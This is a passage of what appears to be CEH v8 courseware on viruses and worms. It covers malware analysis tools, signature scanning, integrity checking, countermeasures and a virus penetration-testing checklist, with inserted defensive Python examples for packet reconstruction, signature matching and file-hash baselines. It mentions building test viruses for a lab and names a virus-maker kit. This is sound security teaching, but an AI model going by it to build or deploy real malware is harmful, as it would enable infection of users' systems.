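    build_frame("198.51.100.20", 80, "10.0.0.5", 1076,
                b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok"),
    build_frame("10.0.0.5", 1104, "198.51.100.20", 443,
                b"\x16\x03\x01\x00\x2a" + b"\x00" * 42),   # TLS record header + stub body
])

def iter_frames(pcap):
    """Yield raw link-layer frames from a classic pcap file written in either byte order."""
    endian = {PCAP_MAGIC: "<", 0xD4C3B2A1: ">"}.get(struct.unpack_from("<I", pcap, 0)[0])
    if endian is None:
        raise ValueError("not a classic pcap file")
    if struct.unpack_from(endian + "I", pcap, 20)[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", pcap, off)
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len

def decode_tcp(frame):
    """Return (src, sport, dst, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4
    total_len = struct.unpack_from("!H", frame, 16)[0]
    src = ".".join(map(str, frame[26:30]))
    dst = ".".join(map(str, frame[30:34]))
    tcp = 14 + ihl
    sport, dport = struct.unpack_from("!HH", frame, tcp)
    data_off = (frame[tcp + 12] >> 4) * 4
    return src, sport, dst, dport, frame[tcp + data_off:14 + total_len]

def http_request_summary(stream):
    """Describe the first HTTP request in a client-to-server stream, or None if it is not HTTP."""
    lines = stream.partition(b"\r\n\r\n")[0].split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None
    host = next((l.split(b":", 1)[1].strip() for l in lines[1:]
                 if l.lower().startswith(b"host:")), b"?")
    method, target = parts[0].decode("latin-1"), parts[1].decode("latin-1")
    return "%s request to http://%s%s" % (method, host.decode("latin-1"), target)

def reconstruct(pcap):
    """Group segments into connections (party A = side that sent first) and join each
    direction's payload in capture order. A full tool also reorders by TCP sequence
    number and drops retransmissions; that is omitted here."""
    flows = {}
    for frame in iter_frames(pcap):
        pkt = decode_tcp(frame)
        if pkt is None:
            continue
        src, sport, dst, dport, payload = pkt
        if (dst, dport, src, sport) in flows:
            flows[(dst, dport, src, sport)]["b_to_a"] += payload
        else:
            flows.setdefault((src, sport, dst, dport), {"a_to_b": b"", "b_to_a": b""})["a_to_b"] += payload
    return [{"party_a": a, "port_a": pa, "party_b": b, "port_b": pb,
             "protocol": {80: "Web", 443: "TLS"}.get(pb, "TCP"),
             "bytes": len(s["a_to_b"]) + len(s["b_to_a"]),
             "detail": http_request_summary(s["a_to_b"])}
            for (a, pa, b, pb), s in flows.items()]
```

Calling reconstruct(SAMPLE_PCAP) gives one row per connection; the first row's detail reads "POST request to http://news.example.test/news/xhr/rhc?authuser=0", which is the kind of entry the Event Detail pane in the screenshot shows.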

Module 07 Page 1087

[Figure: NetResident (Evaluation Version) event list with the columns Date, Last Updated, Protocol, Party A, Port A, Party B, Port B (Web connections from the WIN-LXQN3... host to ports 80 and 443); the Event Detail pane shows a reconstructed "POST request to http://news.google.co.in/news/xhr/rhc?authuser=0" with its cid tag value]

FIGURE 7.29: NetResident Screenshot

Module 07 Page 1088

Malware Analysis Procedure (Cont'd)

7. Collect the following information using debugging tools such as OllyDbg and ProcDump:
• Service requests
• Attempts for incoming and outgoing connections
• DNS tables information

Malware Analysis Procedure (Cont'd)

Step 7: Collect the following information using debugging tools such as OllyDbg and ProcDump:
• Service requests
• Attempts for incoming and outgoing connections
• DNS tables information

OllyDbg

Source: http://www.ollydbg.de

OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft Windows. Its emphasis on binary code analysis makes it particularly useful in cases where source is unavailable.

Module 07 Page 1089

[Figure: OllyDbg window "OllyDbg - OLLYDBG.EXE - [CPU - main thread, module OLLYDBG]" with the disassembly pane (addresses around 00401000 with PUSH/CALL/JE instructions and calls through JMP.&KERNEL32 thunks), the register pane (EAX, ECX, EDX, EBX, ESP, EIP, segment and FPU registers) and the stack pane]

FIGURE 7.30: OllyDbg Screenshot

Module 07 Page 1090

Virus Analysis Tool: IDA Pro

http://www.hex-rays.com

Virus Analysis Tool: IDA Pro

Source: http://www.hex-rays.com

This is a disassembler and debugger tool that supports both Windows and Linux platforms.

Disassembler

The disassembler displays the instruction execution of various programs in symbolic form, even if the code is available only in binary form. It displays the instruction execution of the processor in the form of maps. It enables its users to identify viruses as well. For example, if any screensavers or "gif" files are trying to spy on any internal applications of the user, IDA Pro reveals this immediately.

IDA Pro is developed with the latest techniques that enable it to trace difficult binary code. The results are displayed in readable execution maps.

Debugger

The debugger is an interactive tool that complements the disassembler so that static analysis can be performed in one single step. It bypasses the obfuscation process, which helps the analyst to process the hostile code in depth.

Module 07 Page 1091

IDA Pro is a tool that allows you to explore software interruptions and vulnerabilities and to use it for tamper resistance. It is an interactive, programmable, multi-processor disassembler coupled to a local and remote debugger and augmented by a complete plugin programming environment. It can also be used to protect your essential privacy rights. It is used by antivirus companies, research companies, software development companies, agencies, and military organizations.
[Figure: IDA Pro window titled "IDA - C:\Program Files (x86)\IDA Demo 6.3\qwingraph.exe" with the Functions window (sub_401070, sub_401200, ...), IDA View-A showing the disassembly of a function that calls GetCommandLineW and QString::fromWCharArray / QString::toLocal8Bit, and the Output window reporting that the input file is being analysed and the FLIRT signature for the Microsoft VisualC runtime applied]

Module 07 Page 1092

Online Malware Testing: VirusTotal

VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the detection of viruses, worms, Trojans, etc.

[Figure: VirusTotal file analysis page showing the sample's SHA256, file name and analysis date, followed by the per-engine results (AhnLab-V3, AntiVir, Antiy-AVL, Avast, AVG, ...) with each engine's signature update date; http://www.virustotal.com]

Online Malware Testing: VirusTotal

Source: http://www.virustotal.com

VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, Trojans, and all kinds of malware detected by antivirus engines.

Features:
• Free and independent service
• Uses multiple antivirus engines
• Comprised of real-time automatic updates of virus signatures
• Gives detailed results from each antivirus engine
• Has real-time global statistics

Module 07 Page 1093
[Figure: VirusTotal results page for the same sample, with the detection ratio and the per-engine detection names]

FIGURE 7.32: virustotal Screenshot

Module 07 Page 1094

Online Malware Analysis Services

Anubis: Analyzing Unknown Binaries - http://anubis.iseclab.org
Avast! Online Scanner - http://onlinescan.avast.com
Malware Protection Center - https://www.microsoft.com
ThreatExpert - http://www.threatexpert.com
Dr. Web Online Scanners - http://vms.drweb.com
Metascan Online - http://www.metascan-online.com
Bitdefender QuickScan - http://www.bitdefender.com
GFI SandBox - http://www.gfi.com
UploadMalware.com - http://www.uploadmalware.com
Fortinet - http://www.fortiguard.com

Online Malware Analysis Services

Online malware analysis services allow you to scan files and resources and secure them before attackers attack and compromise them. A few online malware analysis services are listed as follows:
• Anubis: Analyzing Unknown Binaries available at http://anubis.iseclab.org
• Avast! Online Scanner available at http://onlinescan.avast.com
• Malware Protection Center available at https://www.microsoft.com
• ThreatExpert available at http://www.threatexpert.com
• Dr. Web Online Scanners available at http://vms.drweb.com
• Metascan Online available at http://www.metascan-online.com
• Bitdefender QuickScan available at http://www.bitdefender.com
• GFI SandBox available at http://www.gfi.com
• UploadMalware.com available at http://www.uploadmalware.com
• Fortinet available at http://www.fortiguard.com

Module 07 Page 1095

Module Flow

[Figure: module flow diagram with the sections Virus and Worms Concept, Types of Viruses, Computer Worms, Malware Analysis, Countermeasures and Penetration Testing]

Module Flow

So far, we have discussed various viruses and worms and malware analysis. Now we will discuss the countermeasures to be applied to protect against viruses and worms, if any are found. These countermeasures help in enhancing security.

• Virus and Worms Concept
• Types of Viruses
• Computer Worms
• Malware Analysis
• Countermeasures
• Penetration Testing

This section highlights various virus and worm countermeasures.

Module 07 Page 1096

Virus Detection Methods

Scanning: Once a virus has been detected, it is possible to write scanning programs that look for signature string characteristics of the virus

Integrity Checking: Integrity checking products work by reading the entire disk and recording integrity data that acts as a signature for the files and system sectors

Interception: The interceptor monitors the operating system requests that are written to the disk

Virus Detection Methods

A virus scanner is an important piece of software that one should have installed on the PC. If there is no scanner, there is a high chance that the system can be hit by and suffer from a virus. A virus protector should be run regularly on the PC, and the scan engine and virus signature database have to be updated often. Antivirus software is of no use if it does not know what to look for in the latest virus. One should always remember that an antivirus program cannot stop everything.

The rule of thumb is that if an email looks suspicious, e.g., if one is not expecting an email from the sender, does not know the sender, or the header looks like something that a known sender would not normally say, one must be careful about opening the email, as there might be a risk of becoming infected by a virus. The MyDoom and W32.Novarg.A@mm worms infected many Internet users recently. These worms infected most users through email.

The three best methods for antivirus detection are:
• Scanning
• Integrity checking
• Interception

In addition, a combination of some of these techniques can be more effective.

Module 07 Page 1097

Scanning

• The moment a virus is detected in the wild, antivirus vendors across the globe start writing scanning programs that look for its signature strings (characteristic of the virus).

• The strings are identified and extracted from the virus by these scanner writers. The resulting new scanners search memory, files, and system sectors for the signature strings of the new virus. The scanner declares the presence of a virus once it finds a match. Only known and pre-defined viruses can be detected.

• Virus writers often create many new viruses by altering an existing one. What looks like a new virus may have taken just a few minutes to create. Attackers make these changes frequently to throw off the scanners.

• In addition to signature recognition, new scanners make use of various other detection techniques such as code analysis. Before looking into the code characteristics of a virus, the scanner examines the code at various locations in an executable file.

• In another possibility, the scanner sets up a virtual computer in RAM and tests programs by executing them in the virtual space. This technique, called "heuristic scanning," can also check and remove messages that might contain a computer virus or other unwanted content.

The major advantages of scanners are:
• They can check programs before they are executed.
• It is the easiest way to check new software for any known or malicious virus.

The major drawbacks to scanners are:
• Old scanners could prove to be unreliable. With the tremendous increase in new viruses, old scanners can quickly become obsolete. It is best to use the latest scanners available on the market.
• Even a new scanner is never equipped to handle all new challenges, since viruses appear more rapidly than new scanners can be developed to battle them.
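A minimal signature scanner of the kind described above, added here as an illustration (not code from the page or from any antivirus vendor): signatures are byte patterns with one-byte wildcards, as real signature formats allow, files are scanned in overlapping chunks so a match on a chunk boundary is not lost, and the constructed samples show a variant still caught through the wildcard bytes beside one that is missed because a signature byte was altered, which is exactly the "only known viruses" limitation the text states. The signature database and samples are constructed for this example.

```python
import io
import re

# Constructed signature database (not real malware signatures): name -> hex
# pattern; "??" is a one-byte wildcard, as AV signature formats allow.
SIGNATURES = {
    "Test.Sample.A": "4d 5a 90 00 ?? ?? ?? ?? 45 56 49 4c",  # "MZ\x90\0", 4 variable bytes, "EVIL"
    "Test.Macro.B": "41 75 74 6f 4f 70 65 6e",               # "AutoOpen"
}

def compile_signature(hexpat):
    """Turn 'aa bb ?? cc' into a bytes regex: literal bytes are escaped, '??' becomes '.'."""
    parts = [b"." if tok == "??" else re.escape(bytes([int(tok, 16)])) for tok in hexpat.split()]
    return re.compile(b"".join(parts), re.DOTALL)

COMPILED = {name: compile_signature(pat) for name, pat in SIGNATURES.items()}
LONGEST = max(len(pat.split()) for pat in SIGNATURES.values())

def scan_buffer(buf):
    """Return (signature name, offset) for every signature occurrence in a memory buffer."""
    hits = [(name, m.start()) for name, rx in COMPILED.items() for m in rx.finditer(buf)]
    return sorted(hits, key=lambda h: h[1])

def scan_stream(f, chunk_size=1 << 20):
    """Scan a binary stream chunk by chunk, overlapping consecutive chunks by
    LONGEST - 1 bytes so a signature straddling a boundary is still found."""
    overlap = LONGEST - 1
    found = set()
    pos, prev = 0, b""
    while True:
        data = f.read(chunk_size)
        if not data:
            break
        buf = prev + data
        base = pos - len(prev)                # stream offset of buf[0]
        for name, off in scan_buffer(buf):
            found.add((name, base + off))     # a set drops hits seen twice via the overlap
        pos += len(data)
        prev = buf[-overlap:] if overlap else b""
    return sorted(found, key=lambda h: h[1])

def scan_file(path, chunk_size=1 << 20):
    with open(path, "rb") as f:
        return scan_stream(f, chunk_size)

# Constructed samples showing what a signature scanner can and cannot do.
SAMPLE_INFECTED = b"MZ\x90\x00\x03\x00\x00\x00EVIL" + b"\x00" * 32
SAMPLE_VARIANT = b"MZ\x90\x00\x07\x01\x02\x03EVIL" + b"\x00" * 32   # only wildcard bytes differ: still caught
SAMPLE_PATCHED = b"MZ\x90\x00\x03\x00\x00\x00EVIK" + b"\x00" * 32   # one signature byte altered: missed
SAMPLE_CLEAN = b"MZ\x90\x00" + b"\x00" * 40

def boundary_demo():
    """A signature split across a 104-byte chunk boundary is reported at its true offset, 100."""
    return scan_stream(io.BytesIO(b"\x00" * 100 + SAMPLE_INFECTED), chunk_size=104)
```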

Integrity Checking

• Integrity checking products perform their functions by reading and recording integrated data to develop a signature or baseline for those files and system sectors.

• Integrity products check any program with built-in intelligence. This is really the only solution that can take care of all the threats to data. The most trusted way to know the amount of damage done by a virus is provided by these integrity checkers, since they can check data against the originally established baseline.

Module 07 Page 1098

• A disadvantage of a basic integrity checker is that it cannot differentiate file corruption caused by a bug from corruption caused by a virus.

• However, there are some advanced integrity checkers available that are capable of analyzing and identifying the types of changes that viruses make. A few integrity checkers combine some of the antivirus techniques with integrity checking to create a hybrid. This also simplifies the virus checking process.
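One implementation of the baseline-and-compare approach, added here as an example (not the page's code and not RegShot's or any integrity product's); it serves both the "files added" part of step 6 of the malware analysis procedure (snapshot before running a sample, snapshot after, diff) and the integrity checking described in this section. Only the file system is covered, not the registry, and the directory tree, file names and contents in demo() are constructed for the example.

```python
import hashlib
import json
import os
import tempfile

def snapshot(root):
    """Map every regular file under root (path relative to root) to its SHA-256 and size."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(1 << 16), b""):
                    h.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            result[rel] = {"sha256": h.hexdigest(), "size": os.path.getsize(full)}
    return result

def compare(baseline, current):
    """Report what changed since the baseline. A hash mismatch shows that a file
    changed but not why: a legitimate update, disk corruption and a virus all look
    the same here, which is the limitation the text describes."""
    before, after = set(baseline), set(current)
    return {
        "added": sorted(after - before),
        "removed": sorted(before - after),
        "modified": sorted(p for p in before & after
                           if baseline[p]["sha256"] != current[p]["sha256"]),
    }

def save_baseline(snap, path):
    """Store the baseline. In practice keep it offline or signed: malware that can
    rewrite the baseline can hide its own changes from the next comparison."""
    with open(path, "w") as f:
        json.dump(snap, f, indent=1, sort_keys=True)

def load_baseline(path):
    with open(path) as f:
        return json.load(f)

def _write(root, rel, data):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as f:
        f.write(data)

def demo():
    """Constructed scenario: baseline a small tree, then apply the kinds of change
    step 6 looks for after a sample has run (a dropped file, a patched binary of the
    same size, a deleted file) and diff the tree against the stored baseline."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        _write(root, "bin/app.exe", b"MZ original program")
        _write(root, "config.ini", b"[settings]\nupdate=1\n")
        baseline_path = os.path.join(store, "baseline.json")
        save_baseline(snapshot(root), baseline_path)
        _write(root, "bin/app.exe", b"MZ patched  program")   # same size, different content
        _write(root, "temp/dropped.dll", b"new file")
        os.remove(os.path.join(root, "config.ini"))
        return compare(load_baseline(baseline_path), snapshot(root))
```

demo() returns {"added": ["temp/dropped.dll"], "removed": ["config.ini"], "modified": ["bin/app.exe"]}; the patched binary is caught by its hash even though its size and name did not change, which a size- or timestamp-only check would miss.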

Interception

• The main use of an interceptor is for deflecting logic bombs and Trojans.

• The interceptor controls requests to the operating system for network access or actions that cause a threat to the program. If it finds such a request, the interceptor generally pops up and asks if the user wants to allow the request to continue. There are no dependable ways to intercept direct branches to low-level code or direct input and output instructions by the virus.

In some cases, the virus is capable of disabling the monitoring program itself. Some years back it took only eight bytes of code for a widely used antivirus program to turn off its monitoring functions.

Module 07 Page 1099

Virus and Worms Countermeasures

• Install anti-virus software that detects and removes infections as they appear
• Generate an anti-virus policy for safe computing and distribute it to the staff
• Pay attention to the instructions while downloading files or any programs from the Internet
• Update the anti-virus software regularly
• Avoid opening the attachments received from an unknown sender as viruses spread via e-mail attachments
• Possibility of virus infection may corrupt data, thus regularly maintain data back up
• Schedule regular scans for all drives after the installation of anti-virus software
• Do not accept disks or programs without checking them first using a current version of an antivirus program

Virus and Worms Countermeasures

Preventive measures need to be followed in order to lessen the possibility of virus infections and data loss. If certain rules and actions are adhered to, the possibility of falling victim to a virus can be minimized. Some of these methods include:
• Install antivirus software that detects and removes infections as they appear
• Generate an antivirus policy for safe computing and distribute it to the staff
• Pay attention to the instructions while downloading files or any programs from the Internet
• Update the antivirus software on a monthly basis, so that it can identify and clean out new bugs
• Avoid opening the attachments received from an unknown sender as viruses spread via email attachments
• Possibility of virus infection may corrupt data, thus regularly maintain data back up
• Schedule regular scans for all drives after the installation of antivirus software
• Do not accept disks or programs without checking them first using a current version of an antivirus program

Module 07 Page 1100

Virus and Worms Countermeasures (Cont'd)

• Run disk clean up, registry scanner and defragmentation once a week
• Ensure the executable code sent to the organization is approved
• Do not boot the machine with infected bootable system disk
• Turn on the firewall if the OS used is Windows XP
• Run anti-spyware or adware once in a week
• Know about the latest virus threats
• Block the files with more than one file type extension
• Check the DVD and CDs for virus infection
• Be cautious with the files being sent through the instant messenger
• Ensure the pop-up blocker is turned on and use an Internet firewall

Virus and Worms Countermeasures (Cont'd)

• Ensure the executable code sent to the organization is approved
• Run disk clean up, registry scanner, and defragmentation once a week
• Do not boot the machine with infected bootable system disk
• Turn on the firewall if the OS used is Windows XP
• Keep informed about the latest virus threats
• Run anti-spyware or adware once in a week
• Check the DVDs and CDs for virus infection
• Block the files with more than one file type extension
• Ensure the pop-up blocker is turned on and use an Internet firewall
• Be cautious with the files being sent through the instant messenger

Module 07 Page 1101

Companion Antivirus: Immunet

[Figure: Immunet 3.0 main window with the Community pane (number of people protected), the Summary/Scan pane reporting "Scan Complete" with Files Scanned, Threats Detected, Threats Removed and Elapsed Time, the Scan History list, and an offer to upgrade to Immunet Plus 3.0]

http://www.immunet.com

Companion Antivirus: Immunet

Source: http://www.immunet.com

Companion Antivirus means that Immunet is compatible with existing antivirus solutions. Immunet adds an extra, lightweight layer of protection for greater peace of mind. Since traditional antivirus solutions detect on average only 50% of online threats, most users are underprotected, which is why every PC can benefit from Immunet's essential layer of security. Immunet Protect's detection power relies on ETHOS and SPERO, the heuristics-based engine and the cloud engine. Users of the Plus version also benefit from a third engine called TETRA, which provides protection when not connected to the Internet.

Module 07 Page 1102

FIGURE 7.33: Immunet Screenshot

Module 07 Page 1103

Anti-virus Tools

AVG Antivirus - http://free.avg.com
BitDefender - http://www.bitdefender.com
Kaspersky Anti-Virus - http://www.kaspersky.com
Trend Micro Internet Security Pro - http://apac.trendmicro.com
Norton AntiVirus - http://www.symantec.com
F-Secure Anti-Virus - http://www.f-secure.com
Avast Pro Antivirus - http://www.avast.com
McAfee AntiVirus Plus 2013 - http://home.mcafee.com
ESET Smart Security 6 - http://www.eset.com
Total Defense Internet Security Suite - http://www.totaldefense.com

Antivirus Tools
Antivirus tools prevent, detect, and remove viruses and other malicious code from
your system. These tools protect your system and repair virus infections in all incoming and
outgoing email messages and instant messenger attachments. In addition, these tools monitor
the network's traffic for malicious activity. A few antivirus tools that can be used to detect
and remove viruses from systems are listed as follows:
• AVG Antivirus available at http://free.avg.com
• BitDefender available at http://www.bitdefender.com
• Kaspersky Anti-Virus available at http://www.kaspersky.com
• Trend Micro Internet Security Pro available at http://apac.trendmicro.com
• Norton Anti-Virus available at http://www.symantec.com
• F-Secure Anti-Virus available at http://www.f-secure.com
• Avast Pro Antivirus available at http://www.avast.com
• McAfee Anti-Virus Plus 2013 available at http://home.mcafee.com
• ESET Smart Security 5 available at http://www.eset.com
• Total Defense Internet Security Suite available at http://www.totaldefense.com

Module Flow

Types of Viruses
Computer Worms
Countermeasures
Malware Analysis

Module Flow
Penetration testing must be conducted against viruses and worms, as they are the
most widely used means of attack. They do not require extensive knowledge to use. Hence,
you should conduct pen testing on your system or network before a real attacker exploits it.

Virus and Worms Concepts
Types of Viruses
Computer Worms
Malware Analysis
Countermeasures
Penetration Testing

This section provides insight into virus and worm pen testing.


Penetration Testing for Virus

Install an anti-virus program on the network infrastructure and on the end-user's system
Update the anti-virus software to update your virus database of the newly identified viruses
Scan the system for viruses, which helps to repair damage or delete files infected with viruses

Penetration Testing for Viruses
Since you are an expert Ethical Hacker and Penetration Tester, the IT director instructs
you to test the network for any viruses and worms that could damage or steal the
organization's information. You need to construct viruses and worms, try to inject them into a
dummy network (virtual machine), and check whether they are detected by antivirus programs
or are able to bypass the network firewall. As a pen tester, you should carry out the following
steps to conduct a virus penetration test:
Step 1: Install an antivirus program
You should install an antivirus program on the network infrastructure and on the end-user's
system before conducting the penetration test.
Step 2: Update the antivirus software
Check whether your antivirus is updated or not. If not, update your antivirus software.
Step 3: Scan the system for viruses
You should scan your target system; this will help you to repair damage or delete files
infected with viruses.


Penetration Testing for Virus (Cont'd)

[Flowchart: Set the anti-virus to quarantine or delete the virus -> Virus is removed? -> System is safe (system is not infected) / Go to safe mode and delete the infected file manually]

Set the anti-virus software to compare file contents with the known computer
virus signatures, identify infected files, quarantine and repair them if possible
or delete them if not
If the virus is not removed then go to safe mode and delete the infected file
manually

Penetration Testing for Viruses (Cont'd)
Step 4: Set the antivirus to quarantine or delete the virus
Set your antivirus software to compare file contents with the known computer virus signatures,
identify infected files, quarantine and repair them if possible, or delete them if not.
Step 5: Go to safe mode and delete the infected file manually
If the virus is not removed, then go to safe mode and delete the infected file manually.


Penetration Testing for Virus (Cont'd)

Scan the system for running processes, registry entries, startup programs, files and folders integrity, and services

If any suspicious process, registry entry, startup program or service is discovered, check the associated executable files

Collect more information about these from the publisher's websites, if available, and the Internet

Check the startup programs and determine if all the programs in the list can be recognized with known functionalities

Check the data files for modification or manipulation by opening several files and comparing the hash value of these files with a pre-computed hash

Scan for running processes: use tools such as What's Running and Winsonar
Scan for registry entries: use tools such as jv16 Power Tools 2012 and Reg Organizer
Scan for Windows services: use tools such as SrvMan and ServiWin
Scan for startup programs: use tools such as Starter, Security AutoRun, and Autoruns
Scan for files and folders integrity: use tools such as FCIV, TRIPWIRE, and SIGVERIF

Penetration Testing for Viruses (Cont'd)
Step 6: Scan the system for running processes
You should scan your system for suspicious running processes. You can do this by using tools such
as What's Running, HijackThis, etc.
Step 7: Scan the system for suspicious registry entries
You should scan your system for suspicious registry entries. You can do this by using tools such
as JV Power Tools and RegShot.
Step 8: Scan the system for Windows services
You should scan for suspicious Windows services running on your system. You can do this by using
tools such as SrvMan and ServiWin.
Step 9: Scan the system for startup programs
You should scan your system for suspicious startup programs running on your system. Tools
such as Starter, Security AutoRun, and Autoruns can be used to scan the startup programs.
Step 10: Scan the system for files and folders integrity
You should scan your system for file and folder integrity. You can do this by using tools such as
FCIV, TRIPWIRE, and SIGVERIF.


Penetration Testing for Virus (Cont'd)

Scan for modification to OS files: check the critical OS file modification or manipulation using tools such as TRIPWIRE or manually comparing hash values if you have a backup copy (use tools such as FCIV and TRIPWIRE)

Document all the findings: document all your findings in previous steps; it helps in determining the next action if viruses are identified in the system

Isolate the machine from network: isolate the infected system from the network immediately to prevent further infection

Update and run antivirus: sanitize the complete system for viruses using an updated anti-virus

Find other anti-virus solution to clean viruses

Penetration Testing for Viruses (Cont'd)
Step 11: Scan the system for critical OS modifications
You can scan for critical OS file modifications or manipulation using tools such as TRIPWIRE or
by manually comparing hash values if you have a backup copy.
Step 12: Document all findings
These findings can help you determine the next action if viruses are identified on the system.
Step 13: Isolate the infected system
Once an infected system is identified, you should isolate the infected system from the network
immediately in order to prevent further infection.
Step 14: Sanitize the complete infected system
You should remove virus infections from your system by using the latest updated antivirus
software.
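The hash-based integrity check of Steps 10 and 11 and the signature comparison of Step 4, as an added example that is not part of the CEH module and not code from FCIV, Tripwire or any antivirus product. The directory, its files and the "known-bad" hash list are all constructed inside the code; a SHA-256 baseline taken before and after a simulated infection stands in for the pre-computed hashes the steps refer to.

```python
"""
Added example (not from the CEH module): a minimal file-integrity baseline
and hash-signature check of the kind Steps 4, 10 and 11 describe.

- build_baseline() walks a directory and records the SHA-256 of every regular
  file, the job FCIV or Tripwire do in the module's procedure.
- compare_baseline() reports files modified, added or removed since the
  baseline was taken (Steps 10 and 11).
- match_signatures() flags files whose hash is on a known-bad list, the
  simplest form of the signature comparison an antivirus performs (Step 4).

The sample directory, its contents and the known-bad hash list are constructed
for this demonstration only; they are not real malware indicators.
"""
import hashlib
import os
import tempfile
from pathlib import Path

CHUNK = 1 << 16  # read files in 64 KiB pieces so large files are not loaded whole


def sha256_file(path):
    """Hex SHA-256 of a file's contents."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map of relative POSIX path -> SHA-256 for every regular file under root."""
    root = Path(root)
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            # Symlinks are skipped: hashing their target would hide a swapped link.
            if p.is_file() and not p.is_symlink():
                baseline[p.relative_to(root).as_posix()] = sha256_file(p)
    return baseline


def compare_baseline(old, new):
    """Return (modified, added, removed) relative paths, each sorted."""
    modified = sorted(p for p in old if p in new and old[p] != new[p])
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    return modified, added, removed


def match_signatures(baseline, known_bad):
    """Paths whose hash appears in known_bad (a hash-only 'signature' match)."""
    return sorted(p for p, digest in baseline.items() if digest in known_bad)


def demo():
    """Constructed scenario: take a baseline, simulate an infection, re-scan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "app.exe").write_bytes(b"MZ original program body")
        (root / "config.ini").write_text("debug=0\n")
        before = build_baseline(root)

        # Simulated infection: one file altered, one file dropped, one deleted.
        (root / "bin" / "app.exe").write_bytes(b"MZ original program body<appended>")
        (root / "bin" / "dropper.exe").write_bytes(b"MZ constructed dropper")
        (root / "config.ini").unlink()
        after = build_baseline(root)

        # Known-bad list constructed from the sample dropper's own hash.
        known_bad = {hashlib.sha256(b"MZ constructed dropper").hexdigest()}
        modified, added, removed = compare_baseline(before, after)
        flagged = match_signatures(after, known_bad)
        return modified, added, removed, flagged


if __name__ == "__main__":
    modified, added, removed, flagged = demo()
    print("modified:", modified)
    print("added:", added)
    print("removed:", removed)
    print("signature hits:", flagged)
```

Note that a hash-only signature list catches the exact sample it was built from and nothing else, which is why the module pairs it with the integrity comparison that also surfaces the altered and deleted files.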


Module Summary

• Virus is a self-replicating program that produces its own code by attaching copies
of itself into other executable codes whereas worms are malicious programs that replicate,
execute, and spread across the network connections independently without human interaction
• Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a
pre-determined logical circumstance is met
• Viruses are categorized according to the file they infect and the way they work
• Lifecycle of virus and worms include designing, replication, launching, detection, incorporation and
elimination stages
• Computer gets infected by Virus, worms and other malware due to not running the latest anti-virus
application, not updating and not installing new versions of plug-ins, installing the pirated software,
opening the infected e-mail attachments or downloading files without checking properly for the source
• Several virus and worm development kits such as JPS Virus Maker are available in the wild that can be used
to create malware without any technical knowledge
• Virus detection methods include system scanning, file integrity checking and monitoring OS requests
• Virus and worm countermeasures include installing anti-virus software and following anti-virus
policy for safe computing

Module Summary

• A virus is a self-replicating program that produces its own code by attaching copies
of itself into other executable codes, whereas worms are malicious programs that
replicate, execute, and spread across the network connections independently without
human interaction.
• Some viruses affect computers as soon as their code is executed; other viruses lie
dormant until a pre-determined logical circumstance is met.
• Viruses are categorized according to the file they infect and the way they work.
• The lifecycle of viruses and worms includes designing, replication, launching, detection,
incorporation, and elimination stages.
• A computer gets infected by viruses, worms, and other malware due to not running the
latest antivirus application, not updating and not installing new versions of plug-ins,
installing pirated software, opening infected email attachments, or downloading files
without checking properly for the source.
• Several virus and worm development kits such as JPS Virus Maker are available in the
wild that can be used to create malware without any technical knowledge.

• Virus detection methods include system scanning, file integrity checking, and
monitoring OS requests.
• Virus and worm countermeasures include installing antivirus software and following
antivirus policies for safe computing.

More Related Content

PDF
Ceh v8 labs module 19 cryptography
PDF
Ceh v8 labs module 06 trojans and backdoors
PPTX
"Financial 'deglobalization'?: Capital Flows, Banks, and the Beatles" -- Kris...
PDF
Hacking web applications CEHv8 module 13
PDF
Tulsi Gabbard FEC complaint Mufi Hannemann
PDF
2424 8891-1-pb
PDF
Ceh v8 labs module 11 session hijacking
PDF
Ceh v8 labs module 12 hacking webservers
Ceh v8 labs module 19 cryptography
Ceh v8 labs module 06 trojans and backdoors
"Financial 'deglobalization'?: Capital Flows, Banks, and the Beatles" -- Kris...
Hacking web applications CEHv8 module 13
Tulsi Gabbard FEC complaint Mufi Hannemann
2424 8891-1-pb
Ceh v8 labs module 11 session hijacking
Ceh v8 labs module 12 hacking webservers

What's hot (20)

PDF
Understanding Online Consumer Behavior in Fashion E-commerce by the applicati...
PPT
Html + wordpress ppt.
PPT
Catchy web pages via Wordpress
PDF
Ceh v8 labs module 18 buffer overflow
PDF
H3LP DTR V.2.0.
TXT
Winload.efi.mui
PDF
Ceh v8 labs module 10 denial of service
PDF
ANALYSIS OF SUB-PARTICIPATION AGREEMENTS DAMILOLA BEN-OMOTEHINSE
PPT
4 IATA Training
PPT
Survey analysis
PDF
SIM, TIARA AYUNINGSIH, HAPZI ALI, SISTEM INFORMASI MANAJEMEN UNTUK KEUNGGULAN...
PDF
PARASITIC COMPUTING: PROBLEMS AND ETHICAL CONSIDERATION
PDF
Passivhaus on a shoestring
DOC
Backup of diccionary copy
PDF
Copywriting Social Media
DOCX
Top british schools in sharjah
PPT
Writing Workshop
PDF
